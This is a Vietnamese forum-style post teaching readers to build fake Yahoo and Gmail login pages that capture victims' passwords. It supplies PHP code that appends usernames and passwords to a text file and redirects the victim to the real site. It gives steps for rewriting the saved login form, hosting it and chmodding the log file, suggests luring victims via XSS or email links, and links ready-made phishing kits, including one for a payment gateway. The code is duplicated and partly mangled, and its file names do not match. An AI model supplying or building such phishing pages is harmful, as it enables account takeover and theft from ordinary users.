- Nhân tiện đây mình cũng xin hướng dẫn các bạn cách làm trang đăng nhập yahoo,gmail... giả mạo để lừa lấy mật khẩu ...
- Còn làm sao để người ta đăng nhập bằng trang yahoo mạo đó thì do bạn: lợi dụng bug xss, hay gởi link đến nạn nhân dụ dỗ, hay email ... tùy ứng của bạn
- Yêu cầu của mình là khi bạn đọc hướng dẫn bạn làm theo và bạn phải hiểu vấn đề vì sao phải làm thế này thế kia :)
- Cái này thì cũ ri'c từ thời Hùng Vương đến giờ rùi, nhưng đôi lúc vẫn cần va't ra sử dụng đó ... Đồ cũ mà lại hiếm và hay nhìu người ko để ý.
1/ Đầu tiên mở notepad gõ vào nội dung sau:
$now = date("H:i:s Y-m-d");
$ten = $_POST['login'];
$matkhau = $_POST['passwd'];
$f=fopen("yahoo_.txt","a");
fwrite($f," $now ---- User: $ten ---- Pass: $matkhau ----\n");
fclose($f);
?>
<><>
<>location.href="http://mail.yahoo.com"< / script >
< /body>< / html>
$ten = $_POST['login'];
$matkhau = $_POST['passwd'];
$f=fopen("yahoo_.txt","a");
fwrite($f," $now ---- User: $ten ---- Pass: $matkhau ----\n");
fclose($f);
?>
<><>
<>location.href="http://mail.yahoo.com"< / script >
< /body>< / html>
Lưu lại với tên yahoo.php
2/ Tạo thêm 1 file y.txt với nội dung trống rỗng nữa
3/ Vào trang mail.yahoo.com save as toàn bộ trang web lại
- Mở file htm lên bằng wordpad hoặc bằng trình soạn thảo nào đó như Notepad, Notepad++,EditPlus...
Tìm dòng:
< method="post" action="https://login.yahoo.com/config/login?" autocomplete="off" name="login_form" onsubmit="return hash2(this)">
Và thay thế vào đó
< form name="login_form" action="y.php" method="post">
4/ Bây giờ bạn chỉ cần up lên host (host hỗ trợ php). Và CHMOD file y.txt là 777
5/ Xong...
+++ Ngoài ra các bạn có thể giả mạo form đăng nhập bất kì site nào bằng cách tương tự như trên
- Code làm sẵn fake đăng nhập yahoo:
http://www.mediafire.com/?mm2wtzicikq
- Code làm sẵn fake đăng nhập gmail:
http://www.mediafire.com/?wtz1umiiyyk
- Code làm sẵn fake đăng nhập paygate.vtc.vn:
http://www.mediafire.com/?nwwegjzqzjh
reflink: http://vn.360plus.yahoo.com/romeo_nhonguoi_2012/article?mid=61